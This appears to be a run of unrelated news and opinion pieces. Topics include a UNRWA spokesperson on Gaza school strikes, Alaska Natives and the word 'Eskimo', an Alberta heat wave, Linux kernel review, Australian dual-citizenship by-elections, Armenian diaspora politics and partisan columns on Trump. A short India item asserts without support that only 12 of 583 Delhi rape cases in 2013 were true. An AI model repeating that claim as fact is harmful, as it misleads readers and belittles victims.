The idea that because a few militants were near an UNRWA school somehow justifies an artillery shell hitting that school and killing children sleeping by the sides of their parents seems to me, at any rate, as a citizen of the world, not necessarily an expert in international law, completely unconscionable. And I think the very fact that we have seen the quite proper revulsion of the world, given the carnage that we saw, not just in Jabaliya, but last Thursday in Beit Hanoun, I think says something about the way that these arguments are stacking up. It's fine for Israeli spokespeople to say these things, but let us not forget, Amy, that our compound in January 2009 was struck by white phosphorus with a direct hit, where hundreds of people had taken refuge. And we heard similar apologies, protestations, you know, all sorts of fine words from Israeli spokespeople, including Mr. Regev, about how heartbroken they were and how terrible this all was. And here we are five years later with exactly the same parties hitting directly U.N. safe areas which are full of civilians. And, you know, one might also ask Mr. Regev about the pinpoint nature of these strikes, because if it is that nearly two-thirds of these civilians are being struck in pinpoint strikes, one seriously has to wonder about the high technology of the Israeli army and indeed the methodology behind their targeting techniques.
AMY GOODMAN: Christopher Gunness, I want to thank you for being with us, spokesperson for the United Nations Relief and Works Agency for Palestine Refugees, known as UNRWA, speaking to us from Jerusalem
This is Democracy Now! When we come back, a leading voice of U.S. Jewry, Henry Siegman, part two of our conversation with the former head of the American Jewish Congress. Stay with us.
After Alaska Airlines unveiled a new look for its airplanes and website, many Alaska Natives took offense to a phrase in its new marketing campaign, which sparked a controversy and a new round of conversations about what the word "Eskimo" means to Alaska Natives, KYUK Public Media reports.
The Alaska Airlines website prominently featured the familiar face of a smiling Alaska Native elder and also included the phrase "Meet our Eskimo," which was quickly changed to "Meet the Eskimo." But some Alaska Natives say that didn't go far enough.
"I would rather be called 'Inupiaq' because that's what I am, and my children are Yup'ik," said Blossom Twitchell from Kotzebue.
"I want them to be able to connect to their culture and people won't group us in as little people that live in igloos and give little Eskimo kisses all the time; we are so much more than that. We have culture and traditions that have been passed down for generations and I don't believe the word Eskimo does our heritage justice," Twitchell said.
After the Alaska Airlines redesign incident, Twitchell decided to take it a step further by starting a petition asking the Bureau of Indian Affairs to stop identifying people's ethnicity as "Eskimo" in federal paperwork. By Tuesday morning, the petition had more than 200 supporters.
As with the familiar face on the tail of the Alaska Airlines planes, no one seems to have a definitive answer on where the word "Eskimo" came from. An article by University of Alaska Fairbanks linguist Lawrence Kaplan said the word was long thought to mean "eater of raw meat" but linguists now think it came from an Ojibwa word meaning "netter of snowshoes."
The word isn't used much in Canada as it's considered offensive by many Inuit in the country. But Alaska Natives say they have been using the word for a while.
"In my first memories we used Eskimo when referring to ourselves or each other. Then along the way we started using the word Yup'ik to describe ourselves," said Nels Alexie, a Yup'ik elder from Bethel.
Alexie is like many Yup'iks interviewed for this story who are accustomed to the term and have no firm position about whether it's appropriate.
Other Yup'ik elders, however, don't like the term.
"If we stop using the names other people give us, they will understand," said Theresa John, an associate professor for indigenous studies at UAF. "Our ancestors were proud to be Yup'ik and were strengthened by their way of life. They wanted us, their descendants, to keep our tradition alive, not to act like it's not there but to understand it and to live it."
John also added that the word "Eskimo" isn't part of the Yup'ik language, or originally any Native language in Alaska.
Tiffany Zulkosky from Anchorage, a former mayor of Bethel, sent a letter to Alaska Airlines expressing her disappointment about their website statements and invited the company to participate in the Racial Equity Summit sponsored by the First Alaskans Institute.
Airline CEO Brad Tilden released a statement apologizing for the "insensitive reference." The airline ultimately changed its website greeting, completely removing the word "Eskimo," and stated it is looking forward to working with the Alaska Native community to ensure its actions reflect its respect for all Alaska Natives and Alaskans alike.
Preventing heat stoke, why you should NEVER leave your pet in a hot car
Extreme heat prompts warnings in southern Alberta
Find Your Forecast Search for a location
Andrea Bagley
Digital Reporter
Tuesday, June 7, 2016, 10:52 AM - A heat warning remains in place for parts of southern Alberta as temperatures soar into the 30s. On Monday, several record high temperatures were broken across the south, followed by severe thunderstorm watches for the Edmonton area.
"Cells were warned north and south of the city, but no impact was reported on the city itself," says Weather Network meteorologist Kevin MacKay.
SUMMER 2016: Visit the Summer Forecast Guide to the Season for the 2016 Summer Forecast, Fall Weather Preview and much more
"A ridge of high pressure combined with warm south winds will result in temperatures continuing significantly above normal for the beginning of the week," says Environment Canada in the statement. "Daytime highs exceeding 32oC in extreme southern Alberta and temperatures exceeding 29oC in south-central regions combined with overnight lows in the mid teens are expected."
The high heat is expected to persist through Wednesday and may possibly last even longer.
According to Environment Canada, heat related illnesses are preventable and residents are being urged to drink plenty of liquids, especially water, to decrease the risk of dehydration.
"Frequently visit neighbours, friends and older family members, especially those who are chronically ill, to make sure that they are cool and hydrated," EC says. "If you are taking medication or have a health condition, ask your doctor or pharmacist if it increases your health risk in the heat and follow their recommendations."
Spending a few hours in a cool place like a shaded area, swimming pool or air conditioned building is also encouraged while the temperatures are hot as well as rescheduling any planned outdoor activities.
"Heat warnings are issued when very high temperature or humidity conditions are expected to pose an elevated risk of heat illnesses, such as heat stroke or heat exhaustion," EC warns.
In addition to the health concerns, the heat is also impacting the fire danger rating once again. Tuesday's risk in southern Alberta and Saskatchewan is listed at "extreme."
Severe storm potential this week
"We are also keeping a close eye on the severe weather set up through the Prairies this week," says Matt Grinter, another meteorologist at The Weather Network.
Be sure to check back for frequent updates on this week's storms.
Ever since his first appearance in Fantastic Four #13, there has been much mystery surrounded Uatu, also known as The Watcher. He and his people's mission is simple, observe and record everything while not interfering at all. Uatu has, however, interfered on several occasions and eventually left, only returning to witness pivotal moments in our history. His passion and curiosity of our world always keeps him nearby, which may be the cause of what is to come as Original Sin begins…
Since first putting on his fathers Nova helmet, Sam Alexander has been on several adventures. In these travels he's come across Uatu. He is very curious to why he does what he does, watching and recording. Who is he doing it for and for what purpose? No one seems to know and Nova is going to ask him. In his answer we get to see how MUCH he see's as well as why his people do what they do. Nova seems to have an understanding and probably considers them friends. This is probably why he goes out on a limb by asking him something that only he could possibly know. I'm not going to spoil the end, but it's sure to make for a good future Nova storyline!
Mark Waid (writer) has penned an excellent story. I have really enjoyed the newest volume of Nova and really liked how the story unfolded. Jim Cheung (Pencils & inks), Paco Medina (pencils), Mark Morales, Guillermo Ortego, Dave Meikis, Juan Vlasco (all inks) have put together an outstanding looking issue. I especially liked the multi-verse panels. This is just the beginning folks as the mystery behind Uatu's death approaches in the pages of Original Sin #1, due to hit shelves May 7th. This looks to be a must-read event as other secrets of the Marvel Universe will surface, changing many for the foreseeable future! So head on over to your local comic shop and grab your copy today!
(Marvel Comics)
Lancet Oncology: Long-term side-effects of new, targeted therapies in pediatric cancer patients
A University of Colorado Cancer Center review published this week in the journal Lancet Oncology describes possible long-term side-effects of new, targeted therapies in pediatric cancer patients: what we don't know may hurt us.
“As pediatricians who treat kids with cancer, we expect the side-effects of traditional chemotherapies: low white blood count, infections, even long-term heart trouble or infertility. But there's the impression that these new, molecularly targeted agents are much less toxic. That may be true, especially in adult patients, but until we have more information about the long-term effects of these therapies in children, we need to be careful about how and when we prescribe them,” says Chris Porter, MD, CU Cancer Center investigator and assistant professor of Pediatrics at the University of Colorado School of Medicine.
Already we know that molecularly targeted therapies may stunt the growth of pediatric patients, delay puberty or speed the onset of diabetes. And researchers are just now starting to ask about additional, sometimes unforeseen side-effects, potentially including more subtle issues such as neurocognitive, balance and motor defects.
“The growth of cancer cells isn't that different than the growth of a 7-pound baby into a 210-pound teenage linebacker. Now, you shut down these growth pathways in an adult and it might not be a big deal, but you shut down these same pathways at a critical time in childhood development and you can have real problems,” says Lia Gore, MD, CU Cancer Center investigator and associate professor of Pediatrics and Medical Oncology at the CU School of Medicine.
The practical problem is this: FDA approval of many of these drugs for adult use allows physicians to prescribe the same drugs for pediatric use. Many are pills – orally administered, outpatient treatments that make it difficult to recognize and track possible side-effects even in the short-term, let alone 10, 15 or 60 years later.
“The message I really want to convey is that our way of treating pediatric cancer has changed entirely in some diseases, and in some it's meant huge progress. A number of us have patients who have literally been cured by these new drugs. There are a lot of really cool therapies out there, but the issue is using them safely. With increased survival, we need to cure kids for 60-70 years. The question is how do we best treat these kids, knowing that cancer remains the enemy but you also don't want to induce complications that negatively affect the rest of their lives,” Gore says.
“Personally, one of the most important things when choosing how to treat pediatric patients is to know what I don't know – to acknowledge gaps in knowledge. Then as a researcher, we try to fill these gaps so that we can prescribe knowing the balance of risk and reward for these treatments,” Porter says.
For now and until these questions are answered, the researchers recommend using molecularly targeted therapies with pediatric patients only in the context of a clinical trial. To Gore, Porter and co-author James DeGregori, PhD, the framework of a clinical trial provides the oversight needed for the rational prescription of these drugs in pediatric patients – along with follow-up that includes more definite monitoring of side-effects than what Gore describes as “random use.”
“One of the reasons we wrote this paper is that we don't understand the major risks, or even what the major risks might be,” Porter says. “These targeted agents may affect the process of development in ways we can't predict.”
Operating system security is top of mind right now, and Linux is a big part of that discussion. One of the questions to be solved is: How do we ensure that patches going upstream are properly reviewed?
Wolfram Sang has been a Linux kernel developer since 2008, and frequently talks at Linux conferences around the world, like LinuxCon Berlin 2016, about ways to improve kernel development practices.
Let's get his point of view.
In 2013, you warned the ELCE audience in Edinburgh about subsystem latencies and other issues that may arise if things don't change. Did things change? Did some of the things you warned about end up happening?
Yes, to some extent. Of course, the Linux kernel is a very heterogeneous project, so subsystems with more focus are in a slightly better position. However, there are enough subsystems which are "just a piece of the puzzle" and for them latency has not improved, generally speaking.
You've pointed out that the number of reviewers is a problem. Why do you think the kernel development community doesn't have enough reviewers?
One thing is that some people prefer to actually write code and not so much read code. This is OK. It just shows that not everyone is a reviewer, so we should really encourage everyone who likes to do that.
Another thing I see is when we ask people to join our community, it is first mostly about contributing patches. This is natural, I think, and worked well in the beginning when contributions were fewer. But as more and more have joined, especially companies, we've hit this review resource problem. Don't get me wrong, having so many contributions is awesome! I think that we now need to point out that taking part in the community also means more, like to take over some responsibility as a next step. It happens in some parts, but it is not enough to scale yet.
Do you think reviewer training or incentivization of reviewing would help?
One key point for me is to speak out about there being a problem. Yes, we are doing great so far, but that doesn't mean all is well. We also have problems like this scalability issue. Let people know so maybe some parties get interested and join. I don't think we need special training, though. Most reviewers I know are pretty good or talented, they are just too few or have too little time.
What you should have is this intrinsic motivation. For the rest, learning-by-doing works great in this field. This is one of the advantages I like to point out: Reviewing patches makes you a better coder.
In your opinion, are there large, popular projects that you think are doing a really great job at scaling that we might borrow some ideas from?
I don't know one, but am open to hearing about them if there are.
I am very focused on the Linux kernel, so it might be plain bias. However, in my opinion the kernel is indeed special in terms of size, number of contributions, and diversity. So while I think looking at other projects to get inspiration for workflow improvements is always healthy, our scalability problems are pretty unique currently. I find it most useful to look what other subsystems in the kernel are doing.
You've mentioned security issues as something that could come up. What should users be doing to avoid or ameliorate the severity of security issues?
My talk at LinuxCon Berlin this year is targeted at the development level. The security implications could come from patches going in without proper review. I don't want to have users deal with that, I rather want such issues to never happen. This will never work perfectly, but it is still my preferred way to tackle things.
I'm wondering how the wider community could help. Are there certain kinds of bug reports that you wish people would file more often? Particular areas that need regular attention but don't get it for some reason?
We are not short on bug reports. What I am more afraid of is that the shortage of reviewers will lead to more bug reports due to incomplete patches going in. So, we then we'll not only have to deal with the huge amount of contributions, but also with more bugs and regressions.
Is there anything else you wish our readers knew about your work?
With all the specialities around the Linux kernel, it often helps me to remember that at the bottom, it is just code.
This is how close the Government is to losing power over the citizenship debacle
Updated
Malcolm Turnbull has conceded there might be more by-elections to deal with ineligible MPs.
That gets the hearts racing among the political class. But does it mean ordinary voters should be factoring in a visit to the polls on a Saturday soon?
Let's look at how close we could be to another election.
Where and when are people going to have to vote next?
The people of Bennelong in Sydney's west appear most likely because their MP, Liberal John Alexander, might be a dual citizen by descent.
Mr Alexander has not renounced British citizenship, so he would be a dual citizen unless his UK-born father gave it up before he was born. That part's unclear.
(FYI: His dad only had two years in which to do this. The junior Alexander says his father did renounce as soon as he could, but we haven't seen any evidence of that yet.)
Malcolm Turnbull says anyone who believes they are a dual citizen and could be ineligible to sit in Parliament should resign. That puts the pressure on all MPs to recheck their status.
If there are resignations this week, then there is potential for more by-elections by the end of the year, most likely on December 16.
Questions persist about the citizenship of many other MPs, making it possible there could be several by-elections.
How many by-elections before they're in real trouble?
Three would be pushing it. Let's count. (Remember, the Coalition needs half of the 150 House of Representatives seats plus one to form a majority government. That's 76. We're going to focus on the Coalition-Labor numbers, because they're the ones who could form government.)
There's one by-election already underway — in New England, voters are heading back to the polls on December 2 because Barnaby Joyce was a dual citizen when he was elected.
That has temporarily stripped the Government of its one-seat majority, but with the confidence of cross-bencher Cathy McGowan and the Speaker's casting vote, it remains confident.
So they're at 75-69, plus Ms McGowan. Sweet.
New England is a safe seat where Mr Joyce will likely win, restoring the Government's one-seat majority.
That brings them back to 76-69.
But other by-elections would not be so smooth for the Government.
Bennelong would be a test. Mr Alexander held the seat comfortably last year. It has been a long-term Liberal seat, but Labor's Maxine McKew defeated then-prime minister John Howard in 2007, before losing to Mr Alexander three years later.
A Bennelong by-election creates the possibility of the Government getting its one-seat majority back after the New England by-election and then losing it a fortnight later, thus returning to the more precarious situation of relying on Ms McGowan.
Back to 75-70 if Labor was to win that seat (or 75-69 if it went to someone else). Assuming that they'd still have Ms McGowan's support, the Coalition are probably still OK in this scenario.
Trouble would come if there were any further by-elections for the string of seats where there are questions over MPs' eligibility — especially if they are marginal electorates.
If the Government drops below 75 seats we're back in hung parliament territory, where neither major party has enough seats to govern in its own right, so they need to make deals with the crossbench to pass legislation.
If this is ringing a bell, it's because that's where the Gillard government ended up at the 2010 election.
But MPs on both sides have citizenship queries, so it is possible there could be contests in a range of seats around the country to determine if the Government can hold its majority.
Do we all have to vote again?
We're getting deep into hypothetical land here. But the Government *might* decide to hold a full Lower House election instead of a string of by-elections.
The prospect of a series of MPs being ineligible would create intense pressure on the already fragile Government.
The Prime Minister could choose to try to restore stability with an election for the House of Representatives instead.
"Do the unthinkable and put it all on the table" was the phrasing of one Labor figure.
But Mr Turnbull's last big political gamble was for a double-dissolution, and that has not been as successful as he had hoped.
It would be an unorthodox move, because the timing means he could not hold a normal election where voters elect all the House of Representatives members and half the senators.
It would have to only be for the Lower House with a subsequent half-Senate election only possible from July next year.
The last House-only election was in 1972, spookily on December 2, the date of the New England by-election.
Stay tuned.
Topics: federal-parliament, parliament, government-and-politics, federal-elections, law-crime-and-justice, constitution, australia
First posted
Editorial, 30 July 2016
The split began when large numbers of Armenians left Armenia to settle in Cilicia as they fled the 11th and 12th century Seljuk invasions. From 16th century on Turkish/Persian hostilities further split the two segments of the nation as the occupying empires fought for dominance over Armenia. The disconnect between eastern and western Armenians became more severe with the arrival of the Russians who challenged the Ottomans and Safavids. The two solitudes of Armenians became even more extreme when Armenia was Sovietized. For the next 70 years Armenia was on the dark side of the moon for many Diasporans.
The separation of the two arms of the nation created different dialects, mindset, folklore, priorities, music, and literature. The two cultures were also impacted by odars—Russian and Iranian in the case of eastern Armenians and Turkish, Arab, Western European and American for western Armenians.
But despite the Iron Curtain, Diasporans rushed to help Armenia during the 1988 earthquake and the Artsakh War. The Diasporans and citizens of Armenia hugged and behaved like long-lost brothers and sisters after Armenia and Artsakh gained independence. Euphoric Diasporans rushed to the homeland, thirsty for Hayastan's water and air. They wanted to see Holy Echmiadzin, Mt. Ararat, Keghart, Lake Sevan, the Opera… and they wanted to talk in the mother tongue with bus drivers, policemen, store salesmen and bank tellers. They wanted to hug Yerevantsis on the street. For the first time in their lives they felt the exhilaration of truly being at home. The Armenian victories against the Azeris added spring to the Diasporan psychic uplift. The children of the Diasporans, living thousands of miles away from the homeland, began to connect with their parents' “mythical” Hayastan. They were proud of Artsakh War heroes and the recovery of Armenian lands. They wore the tricolor on their lapels and adorned their cars with the flag. The Diaspora –individually began sending aid (money, equipment, expertise) and open businesses. Fundraising global telethons were organized, Diaspora professional groups held meetings in Yerevan to explore ways to contribute to Armenia. Eventually, all three Diaspora-based political parties moved their headquarters to Yerevan.
But the heady days didn't last long. There was a viper in the garden: in fact, many vipers. Diasporans began to hear of corruption, arbitrary rule of law and the callow regime's indifference to the widespread poverty. They became aware of vanishing Diaspora donations. They heard about donated medical equipment winding up for sale in Moscow. They heard about the fraudulent elections, the oppressive government bureaucracy and monopolistic oligarchs who conspired to bankrupt Diasporans who had launched businesses in Armenia. Betraying the attitude that Diasporans are cash cows, the Levon Ter-Petrossian government charged Diasporans $1,000 to grant them passport. The Diasporans saw the miserable conditions their compatriots lived in Hayastan. They heard of the excesses of the oligarch-Catholicos Karekin II. Diasporans learned that it didn't matter whether the country was ruled by Ter-Petrossian, Kocharian, or Sargsyan: all three leaders headed undemocratic governments. The problem was systemic, cultural, and deeply ingrained. Body politic was sick.
Diasporan warmth towards the homeland began to cool. The All-Armenia Fund barely raised $10 million in the past year. That's less than half of what it raised in the halcyon days. Revulsion with Yerevan authorities set in and transformed into indifference towards Armenia because Diasporans—three-quarters of the world Armenian population--could see they had no way of making a difference in Hayastan. Diaspora's disgust with Armenia's authorities further “enhanced” the two solitudes.
Again and again Armenia sought Diaspora's assistance but not its views. After a while the Diaspora refused to be taken for suckers, in the graphic North American parlance. Some Diasporans continued to assist but bypassed the heavy-handed, bureaucratic and corrupt authorities. It was a difficult option but the only way donors could be certain aid would reach its target.
The Diaspora/Armenia relationship became more complicated as a result of the three Diaspora political parties' reluctance to criticize the Sargsyan regime in the misguided belief that the Diaspora should support Armenia no matter what. Meanwhile, the Armenian Revolutionary Federation, the biggest Diaspora political party, joined Sargsyan's coalition government. The “indifference” of the Diaspora parties to the plight of the citizens of Armenia widened the fissure between the citizens of Armenia and the Diasporans.
Thus the Two Solitudes drifted even more. Diasporans continue to be interested in what's happening in Armenia: they want to help; some still own apartments and have minor investments; they visit Hayastan, but, as the song says, “the feeling is gone”.
Diasporans have concluded that peaceful reform is impossible: elections, rallies, demonstrations to bring about democratic change have been met by repression. The weak state has a strong government. Until recently many Diasporans believed citizens of Armenia—cowed and weakened by the authorities—didn't have the gumption and leadership to bring about democratic change after all many citizens, who could have made an impact, had left the country in disgust and despair. Thus it is no surprise that despite their revulsion of domestic violence, many Diasporas were encouraged by the Sasna Dzrer action.
No one knows how the Erebuni police station crisis will impact on how Armenia is governed. Sasna Dzrer has tapped the vein of discontent but were it to succeed in toppling Sargsyan, it wouldn't necessarily mean Armenia would be on easy street: Sasna Dzrer and others who oppose Sargsyan have not shown that they're capable of tackling Armenia's economic, social and foreign policy challenges. But one thing is certain: continued Sargsyan rule will guarantee further misrule, economic paralysis and emigration. How can Armenia defend itself when the population is thinning? How can Yerevan support a credible army when it doesn't have the manpower and the tax base?
The 40 or so oligarchic families have no intention to change their ways. As long as the invalid is breathing, the leeches will hang around. They have charted their future: some have dual citizenship/landed immigrant status in faraway countries; money and property in foreign lands; some family members are already overseas…buying $45-million villas in Southern California. If their situation becomes untenable these plutocrat clans have probably arranged safe passage for themselves and for their ill-gained wealth to Moscow, Dubai, London, and Los Angeles.
Zareh Sinanyan, former mayor of Glendale, is advocating constructive dialogue between Armenia and the Diaspora. Sinanyan believes Diaspora's power (financial, human, knowledge, know-how) is limitless and that it can have a huge and positive impact on Armenia. He says Diaspora support is “limited, reactive, not systematic, and at the spur of the moment.” Meanwhile historian Knarig Avakyan of Yerevan is advocating mass migration of the Diaspora to Armenia/Artsakh. The ex-mayor and the historian ignore two facts: unless there is concrete improvement in Armenia's governance and a diminution of the oligarchic regime, the Diaspora will maintain its distance. Yerevan's scattering medals to every other Diasporan Tom, Dick and Harriet will not reverse the confidence tide. And unless the Diaspora is assured that Sargsyan will not hand Artsakh to Azerbaijan, there can be no rapprochement between the two solitudes and emigration to Armenia will remain a dream.
Earlier this month Ashot Grigoryan, president of the Forum of Armenian Associations of Europe declared there's a secret deal brewing between Aliyev and Sargsyan whereby Armenia will give parts of the liberated territories and Artsakh to Azerbaijan for a few billion dollars. Anti-Sargsyan activist and Artsakh hero Jirayr Sefilyan has expressed similar views. For doubting Sargsyan's intentions and for demanding the president's resignation, Sefilyan was put to jail. That action precipitated the armed occupation of the police station.
Unless there's a radical improvement in Armenia's governance and Sargsyan declares Artsakh is not on the negotiation table, it's possible that Armenia—to paraphrase T.S. Eliot (“The Hollow Men”)--will die not with a bang but with a whimper. If it dies, it will be murder, not suicide.
Updated: Mar 28, 2015, 21:40 IST
Out of the 583 rape cases reported in Delhi in 2013, only 12 were true. Shocked? If you think India is the rape capital of the world, here is a video by Teen Pathar that will change your perception about your own country. Yes, women safety is one of the biggest issues plaguing the nation. Yes, we need to do whatever can be done to ensure that the women in this country don't have to think twice before stepping out. But, in our fight for a safer nation, we've oppressed our women even more, pushing them into a bubble of fear. India isn't as unsafe as the media portrays it to be. It is time we stop being so scared all the time and instead encourage our women to live freely, step out when they want to, wear what they feel like. Sensationalizing rapes in India is clearly not going to help. Let's focus on how to deal with them.
Don't Miss
When Sen. Joni Ernst (R-Iowa) dropped out of the running to be Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say he should get less than 10 years in prison MORE's vice president last week, the odds went up that the GOP will have an all-white and all-male ticket.
The GOP's primetime convention lineup in Cleveland is taking on the look of a parade of older white men, too. The exceptions are likely to be Ernst and perhaps some fashion-model beautiful women from the Trump family.
ADVERTISEMENT
Overall, Trump's convention is going to look like a boys' locker room compared to a Democratic convention focused upon the first female presidential nominee of a major party.
The heart of Trump's problem is that top Republican women, especially women of color, are distancing themselves from him and his convention.
New Mexico Gov. Susana Martinez, whom Trump has disparaged as “not doing the job,” and South Carolina Gov. Nikki Haley have gone out of their way to publicly signal their distaste for Trump. Condoleezza Rice's name was mentioned as a possible vice presidential pick. Rice made clear she was not interested in any such offer; she will not even attend the convention.
Even a political newcomer, Rep. Mia Love of Utah, plans to skip the convention. Love is the first black female Republican ever elected to Congress.
At the 2012 Republican National Convention, presidential candidate Mitt Romney made a big show of giving primetime speaking slots to Rice, Martinez and Haley. He hoped to give his campaign a much-needed summer boost as he trailed President Obama badly among women of color. Romney went on to lose 96 percent of black women and 76 percent of Hispanic women.
Four years later, Trump is in such a deep hole he can't even match Romney's ability to have women stand up for him at the convention.
The absence of prominent women speaking for the GOP nominee is incongruous with political reality. Women are now the majority of all voters in presidential elections. In 2012, women cast 53 percent of the total votes.
In the last presidential race, Obama lost to Romney among white women. But with a record turnout by black, Hispanic and Asian women, Obama won the election.
Now the rising number of minority women voters spells big trouble for Trump in swing states such as Florida, Nevada, Arizona and Virginia.
A Quinnipiac poll taken late last month found Trump registering exactly one percent support among African-American voters with Clinton garnering 91 percent.
Among Latina women, a Fox News Latino poll in May found Clinton leading Trump by 68 percent to 17 percent.
The Latino electorate is revved up for a strong turnout to take down Trump, given his hard line on illegal immigrants and his especially harsh comments about Mexico and Mexican immigrants — including recently pointing to a plane flying over a rally and suggesting Mexico might bomb the U.S.
Black women, meanwhile, have already provided the firewall for Clinton that allowed her to defeat her primary rival, Sen. Bernie Sanders Bernard (Bernie) SandersPush to end U.S. support for Saudi war hits Senate setback Sanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' MORE (I-Vt.).
The Rutgers University Center for American Women and Politics reported last year that because “Black women have topped all other race and gender groups in turnout in the past two presidential cycles, Democratic candidates and campaigns will rely on their votes to secure their base. Likewise, Republican candidates and campaigns may seek to chip away at the Democratic stronghold among Black women voters.”
But with Trump as their candidate, the GOP effort to “chip away” at Democrats' dominance of the black female vote becomes impossible.
And then there is Trump's history with white women.
He has already been featured in two political ads, one run by anti-Trump Republicans and the second sponsored by the top super-PAC supporting Clinton, Priorities USA. In the super-PAC ad, women of all colors lip sync as Trump makes negative comments about women, claiming that one woman has a “fat ass,” asking whether “you like girls who are 5”1', they come up to you know where” and offering his judgment that a woman “who is very flat chested is very hard to be a ten.”
Trump's problem with women voters is an exaggerated reflection of the Republican Party's problem with women.
Of the 20 women currently serving in the U.S. Senate, only six are Republicans. Of the 84 women serving in the House, just 22 are Republicans. In the Senate, one of those six, New Hampshire's Kelly Ayotte Kelly Ann AyotteBottom Line US, allies must stand in united opposition to Iran's bad behavior American military superiority will fade without bold national action MORE, is one of the most vulnerable incumbents running for reelection this year.
As The Hill reported last week, House Republicans are increasingly worried that their most endangered incumbents are disproportionately women and minorities.
The report pointed to Love and Texas Congressman Will Hurd, the only black Republicans in the House, as two of the most vulnerable in the country. Also targeted are Arizona's Martha McSally, Virginia's Barbara Comstock and New York's Elise Stefanik.
In addition, the House GOP is losing two female incumbents to retirement this cycle, while another — North Carolina's Renee Ellmers — will also be gone, having lost her primary.
By contrast, House Democrats are led by a woman, Minority Leader Nancy Pelosi (Calif.), and will almost certainly grow and replenish the number of women in their ranks.
After the 2012 election, Republican National Committee chairman Reince Priebus told reporters: "The RNC cannot and will not write off any demographic or community or region of this country.”
But that is what is going on in 2016. Trump's strategy is based on increasing the white vote, and especially the white male vote.
Twenty-eight years ago, Texas Gov. Ann Richards delivered the keynote speech to the Democratic National Convention.
She quipped that women “can perform [in national politics] — after all, Ginger Rogers did everything that Fred Astaire did, she just did it backwards and in high heels.”
Next week in Cleveland, any woman supporting Trump is going to have to dance backwards, blindfolded and balancing a ton of political baggage on her head.
Juan Williams is an author and political analyst for Fox News Channel. His latest book, "We The People: The Modern-Day Figures Who Have Reshaped and Affirmed the Founding Fathers' Vision of America," published by Crown, is out now.
This week, the speculation over Trump's financial status and slippery tax history may have finally been corroborated with the release of several pages of the Republican nominee's 1995 tax returns to the New York Times. So far, the documents appear to be genuine, and they've led to exactly the unsavory implications we've been waiting for, both about the candidate and the tax code loopholes that invite the wealthy to avoid paying their share. It's quite probable that Trump, self-made American billionaire, hasn't paid a single cent in federal income tax since the mid-'90s.
Donald Trump is fond of targeting people, both citizens and undocumented immigrants, he considers to be abusing America's welfare system and taking benefits without paying dues. So, by way of rebuttal, here's a short list that uses a simple metric (taxes) to take a look at the people who have given back to their country more than the Republican nominee.
Immigrants
Last year, Trump claimed undocumented immigrants were getting $4.2 billion in tax credits, a statement Politifact subsequently found to be fairly misleading—as the liberal-leaning Center on Budget and Policy Priorities has said, the government may have been giving tax credits based on the children of the undocumented, but it was still taking in more money from tax revenue than it was shelling out in credits. Undocumented immigrants pay significant chunks of state and local taxes—as much as $11.64 billion a year, according to some estimates. But studies have also suggested that between 50% and 75% are on the books, using fake SSNs or tax identification numbers—which means they contribute to state and federal tax coffers while being ineligible both for EITCs and the federal programs those tax dollars fund.
These trends don't alter much for the children of undocumented immigrants or those who do eventually naturalize. A few years ago, the National Research Council reported that the average naturalized immigrant and their children will pay between $20,000 and $80,000 more in taxes over their lifetime than they will receive in any kind of benefit—local, state, or federal.
Retired veterans
Earlier this year, Trump publicly slammed the Khan family, the parents of a Muslim veteran killed by an IED in Iraq, after they spoke out against his so-called immigration policy during the DNC. Subsequently, his relationship to the military has been fraught, to say the least, though he has been endorsed by a number of retired generals: he's referred to PTSD as the affliction of the weak and compared his parentally mandated stint in military school to something like actual conscription.
The tax codes for military veterans, depending on their length of service and the status of their health, can vary wildly; if a service member is deemed significantly wounded by the Veteran's Administration, their disability pay may not be subject to certain federal or local taxes. (One would imagine it's the least we could do, considering what we put them through.) For veterans who are not disabled, however, military pensions are subject to the same federal taxes as anyone else—which means in addition to their very real and physical sacrifices in war, they're paying more to the government than the Republican nominee.
Single people making $15,000 a year
There's a long and heavily partisan precedent for demonizing the working poor; Trump, of course, has never held back. In 2011, in response to a comment from Obama on the importance of welfare, he took it to Fox News. “You do have a problem because half of the people don't pay any tax,” he said, predicting Mitt Romney's poisonous comments about the 47 percent. “He's talking about people that aren't also working, that are not contributing to this society.”
The Earned Income Tax Credit, created in the ‘70s as a temporary measure to offset payroll tax and skyrocketing food and energy costs, is still offered four decades later for lower-income populations and the working poor. To date, Trump's campaign hasn't proposed a change to the EITC's thresholds, which much like the federal poverty line feel reflexively inadequate when it comes to addressing the cost of living in America today. For example: For a single, childless person to qualify for an EITC, they must make less than $14,820, meaning a person making $15,000—40 hour weeks at the federal minimum wage—wouldn't make the cut. Besides, most studies show that the vast majority of EITC recipients only require the credit for one or two years, a statistic directly in opposition to the idea of a decades-long free ride.
Native Americans
“Organized crime is rampant on Indian reservations,” Donald Trump said in 1993, during a federal suit in which he attempted to ban the construction of casinos in New Jersey. The suit alleged that, in essence, the law favored First Nations in Atlantic City as the gaming laws favored a “limited class of citizens.”
Native American tribes and the tribal corporations they own may be tax exempt, but that doesn't mean individuals are; the income generated by a tribal business, distributed to an individual member of a tribe, is subject to federal taxation. So while First Nations may operate tribal governance and pay no income tax for the land trusts on which they live, they still pay more dues to the U.S. government than Donald Trump—despite, you know, having been violently purged from their homeland and systematically disenfranchised by the very government they pay.
But perhaps it's repetitive to point to such blatant shows of disrespect—this is, after all, the candidate who said during a presidential debate his ability to evade paying taxes was “smart,” and who when the documents leaked issues a statement equating being crooked and sloppy with being deft.
“Mr. Trump knows the tax code far better than anyone who has ever run for President,” read the official statement. “And he is the only one that knows how to fix it.”
Watch: The Real Danger of a Donald Trump Presidency
WWE Superstar Wade Barrett talks to Neil Docking ahead of WWE's UK Tour next month.
I understand you've been back in England for a few weeks now, can you tell us why that is?
WWE Superstar Wade Barrett with Preston North End left wing back Scott Laird
“I've been back sorting out a new Visa at the moment, we've had a couple of delays on that. I actually went and watched Preston North End a few weeks ago, I went and watched them play away at Walsall and met the manager and the players, which was pretty cool. I've been back for about four weeks.”
When we spoke earlier this year you said you were pleased with the appointment of manager Simon Grayson and that you thought he would do well, but did you expect them to start the season this well?
“To be unbeaten nine games in, it was pretty incredible. I think with Preston's background in play-offs, I've seen us lose enough times, so I think we need to make that push for automatic promotion.
